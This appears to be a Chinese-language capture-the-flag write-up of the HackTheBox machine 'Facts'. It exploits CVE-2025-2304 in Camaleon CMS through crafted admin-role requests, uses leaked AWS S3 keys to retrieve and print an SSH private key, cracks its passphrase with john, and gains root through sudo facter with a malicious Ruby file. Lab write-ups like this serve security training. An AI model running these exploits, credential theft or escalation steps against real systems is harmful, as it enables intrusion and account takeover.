[TOC] ## Fact https://app.hackthebox.com/machines/Facts?sort_by=created_at&sort_type=desc ![image](https://hackmd.io/_uploads/Sy72Z85sWe.png) ### 找服務&版本 :::info nmap 10.129.244.96 -sV -A ::: 知道目標有開 80、22 port ![image](https://hackmd.io/_uploads/r1uUSHqoZl.png) 根據找的的版本去查詢有沒有能利用的 CVE,結果沒找到... ### 80 port 實際到網頁看,發現他就是個類似部落格的網站,從下圖判斷這是一個 Camaleon CMS,這是一款基於 Ruby on Rails 的動態高級內容管理系統 ![image](https://hackmd.io/_uploads/HJx9NBqibg.png) 再繼續逛發現 /page 跟 /search,但是對他們的參數做 fuzz 沒發現什麼有趣的回應,嘗試爆破路徑,發現有 admin 路徑,只是被 redirect 了,跟著跳轉過去發現是個登入頁 ![image](https://hackmd.io/_uploads/HyzmNBcibl.png) ![image](https://hackmd.io/_uploads/ByNmvBcsbl.png) 原本看 Camaleon CMS 現有較大的漏洞 CVE-2025-2304、CVE-2024-46986 還沒有想法,找到登入頁後好像可以試 CVE-2025-2304 ### CVE-2025-2304 :::info 問題發生在 .permit! 他會把 params.require 帶著的 用戶輸入的值整個塞進資料庫裡面 假設輸入內容像這樣 : `{ "password" => "hacked123", "role" => "admin", "is_admin" => true }` .permit! 就會去對應欄位把值塞進去,如果有 role 或 is_admin 欄位,那成功更改裡面的值就能提權 ``` def updated_ajax user_params = params.require(:user).permit! current_user.update(user_params) end ``` ::: http://facts.htb/admin/login ``` POST /admin/login HTTP/1.1 Host: facts.htb Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: _factsapp_session=%2FdC6I7ol%2Bst1r8szKGGGd70DRB9lRXDhhXapQn9cj%2BNXGJ8CACjSbX3pDH7h2WxSsUac4olxtHkj5MlSuklGUWJjdAakFEDEvpOizWVRMWRLoS6LJz1YfY6Oe96cRvdwKmy98PxakYZR76hMPYya2tCVsebe3NFWhCNkD9dR%2B9AXV1JNL6aFEW1alO1uSN1wrJvldrlTzZXW9e7z2Fe4P0XGQLMtGx1BgoRC6PBw80UbCRVM6snFHEKVu91JWri7RLWZk78yde%2FEDeb061oZZdSZ3%2B9LDmsZts7%2BrxkRIzB7DhuBGqddEA9WWh6M3KYGwIzOz4RAiLAMuWclxOdjtzaZn4mk55YbG5hcmB3dLhjJ%2Fy6Yx9fahx0%3D--mqau9n9PDQ0g%2Bqre--uFsKcWyH3o%2BNbCdVzVvxYQ%3D%3D Connection: close authenticity_token=5J91WenYidkCIXYmi6EDjxwxlXNodhEqVxWcKDOpP5MxjQ2zhHbhQpgp0dTvvFFQ91oe2yffVaRDbXW_gpE6TQ&user%5Busername%5D=bali&user%5Bpassword%5D=bali123&user%5Brole%5D=admin&user%5Bis_admin%5D=true ``` ``` POST /admin/users/5 HTTP/1.1 Host: facts.htb Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: auth_token=uQJH7h7nrGq_Co1ogCX2-A%26Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F120.0.0.0+Safari%2F537.36%2610.10.17.197; _factsapp_session=N64ab2HTYUUR9dmltZwhf7yhHbQ%2B9%2BmU6WSWp3cF8YK4%2Fw50LQJgcs0G97kSQEKm74kMY93%2BWNRDJhee79rFGAk4Cdjbio7z7%2FqUUp%2BK0Du25IjbJ6dKrCRBf7R2fvy81ifNQNhqtCm02KgNxka%2FhYP95QfvDQN8FJEpww9Z6bns9j0FST9pjKQOhEig8HnaV%2Bs6RQQ9AOulWV0zULr3J5RFd%2F6cdf8fU7lPfPZlZoAT8mBuoj62ejYJC5WBy3IdbAHCqqxv3QSpWxliiEFB0ltlVEbzEc5CfNsaJqvIvm8kX%2FXH6u%2FFjJlWHNtYh%2F8%2FmF%2FG3vDZZCz0pQfIyxoxsaBWd3MXCVdzRIanf59mjfcKYEeuNJ0Rt0E%3D--S10wtQURSEyIy0vX--sHUYaQ6RoMiuBwDsaU8zEw%3D%3D Connection: close _method=patch&authenticity_token=EpeFMQpTE_8sm88Uh13SfCn7mgL0WYSutwnIVelCr7pZNz5ijiIZDsBQA3ztn8aakjTdrN_Rknx9FSMdv9pIvg&meta%5Bavatar%5D=&user%5Busername%5D=bali&user%5Bemail%5D=test%40test.com&user%5Bfirst_name%5D=bali&user%5Blast_name%5D=lin&meta%5Bslogan%5D=123&user%5Brole%5D=admin&user%5Bis_admin%5D=true ``` 自己試一直失敗,使用現成的 CVE 開源 poc 工具 https://github.com/d3vn0mi/cve-2025-2304-poc 最後成功的是 `password[role]=admin`,不是 user[role]=admin ![image](https://hackmd.io/_uploads/ByCQfHfhbe.png) 成為 admin 了 ![image](https://hackmd.io/_uploads/SJHHVrGhZg.png) 到處翻翻看看發現 AWS s3 資訊 ![image](https://hackmd.io/_uploads/Bk5pZuQnZl.png) ``` AKIA808C72183237BB40 ZkKBOjSNm2V82l3w6Pu2+JcRe8PS2bTwaipboiaW randomfacts us-east-1 http://localhost:54321 http://facts.htb/randomfacts ``` ### 利用 AWS s3 設使用者之後才能使用 ``` aws configure --profile facts ``` 一直在 randomfacts 下嘗試,都只有圖片檔 也嘗試丟奇怪的東西上去 但也沒有用 s3 不會去執行 ``` aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls s3://randomfacts/ --recursive ``` ![image](https://hackmd.io/_uploads/rJ8ffd72Zg.png) 之後問 AI 知道怎麼列 Bucket 名稱,發現 s3://internal ``` aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls ``` ![image](https://hackmd.io/_uploads/S1jumdmnZe.png) 找到 s3://internal 去列出底下有哪些資料,下面看到 .ssh/id_ed25519 私鑰 ``` aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 ls s3://internal --recursive ``` ![image](https://hackmd.io/_uploads/HJoHEOm3be.png) 但是這裡沒辦法用 cat 來顯示,所以用 cp 複製到 - 表示 stdout ``` aws --endpoint-url http://10.129.16.65:54321 --profile facts s3 cp s3://internal/.ssh/id_ed25519 - ``` :::success -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABBLs0gLF4 f3h4rIOAN0rEVWAAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIKSV0hsk3XXWG35D Ee0iM+VycFL1iX7XT2+EZEca0JT+AAAAoKRfk3KY9C5sh1631FGpWKcFnGkYYDRLcvFjCc SpOX1fWyvAsgiWekvdlSDa9wvnXSNMgSIqeMRhvbcCnbG7O/scfB7JB76wjdkA04HIZW8n eA95dUj/xnFM7yMC7dUs50F+JAy+ySCDAUiCGdu7qrjIiNIev35IVraXROfDPZG2La3W1w tOnayYMscBftBBuprbvIxIEEZolYLCfFeIQm4= -----END OPENSSH PRIVATE KEY----- ::: 順便看一下 .profile 可能會有關環境中重要的線索 :::success \# ~/.profile: executed by the command interpreter for login shells. \# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login \# exists. \# see /usr/share/doc/bash/examples/startup-files for examples. \# the files are located in the bash-doc package. \# the default umask is set in /etc/profile; for setting the umask \# for ssh logins, install and configure the libpam-umask package. \#umask 022 \# if running bash if [ -n "\$BASH_VERSION" ]; then \# include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "\$HOME/.bashrc" fi fi \# set PATH so it includes user's private bin if it exists if [ -d "\$HOME/bin" ] ; then PATH="\$HOME/bin:$PATH" fi \# set PATH so it includes user's private bin if it exists if [ -d "\$HOME/.local/bin" ] ; then PATH="\$HOME/.local/bin:$PATH" fi ::: ### ssh 連線 雖然有私鑰了,但是還是不知道帳號是誰 試過以下幾種 ``` id_ed25519 admin internal randomfacts ``` 如果把拿到的金鑰直接拿去用會出現這個錯誤 :::info WARNING: UNPROTECTED PRIVATE KEY FILE! ::: 要把它消掉需要設定金鑰的存取權,改成 600 ``` chmod 600 htbKey ``` 之後也有發現這個錯誤,意思是這個私鑰有被密碼保護,所以需要密碼 :::info Load key "sshKey": incorrect passphrase supplied to decrypt private key ::: 為什麼會出現上面那個訊息,是因為我想用 `ssh-keygen -y -f sshKey` 這個指令找到登入的帳號,但是因為需要密碼所以要去爆破了 #### 爆破密碼 先轉格式 ``` ssh2john sshKey > sshKey.hash ``` 再用 john 爆破,看密碼 ``` john --wordlist=/usr/share/wordlists/rockyou.txt sshKey.hash john --show sshKey.hash ``` <!-- ![image](https://hackmd.io/_uploads/r18cnKm2Wl.png) --> #### 找 ssh 帳號 知道密碼後重新回來這個指令,他把對應的公鑰格式印出來,就會包含帳號 ``` ssh-keygen -y -f sshKey ``` :::success Enter passphrase for "sshKey": ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKSV0hsk3XXWG35DEe0iM+VycFL1iX7XT2+EZEca0JT+ trivia@facts.htb ::: 現在有私鑰、私鑰密碼、帳號 就可以來 ssh 了 成功進到目標電腦拿到第一個 flag ![image](https://hackmd.io/_uploads/S19uatm2-x.png) ### 提權 <!-- 嘗試提權,從最常見的步驟開始,找可以用 root 權限執行的檔案 ``` find / -perm -u=s -type f 2>/dev/null ``` - -perm:代表搜尋特定的權限 - -type f : 表示類型為檔案 --> 提權先找 sudo 列表,發現 /usr/bin/facter 這個檔案不用密碼就可以用 ``` sudo -l ``` :::success Matching Defaults entries for trivia on facts: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User trivia may run the following commands on facts: (ALL) NOPASSWD: /usr/bin/facter ::: 去找 https://gtfobins.org/ 看要怎麼利用 facter facter 問題發生在,它允許使用者寫自定義的 Ruby 腳本來擴充功能 facter 執行時,它會主動去尋找並執行這些 .rb 檔案 ![image](https://hackmd.io/_uploads/HJjzGcQnbg.png) 所以先寫一個惡意的 rb 檔案 ``` echo 'exec "/bin/bash"' > /tmp/exploit.rb ``` 用 sudo 利用 facter 去把惡意檔案起起來 ``` sudo facter --custom-dir=/tmp x ``` ![image](https://hackmd.io/_uploads/BylFz9mnWe.png) 就可以去找第二個 flag 了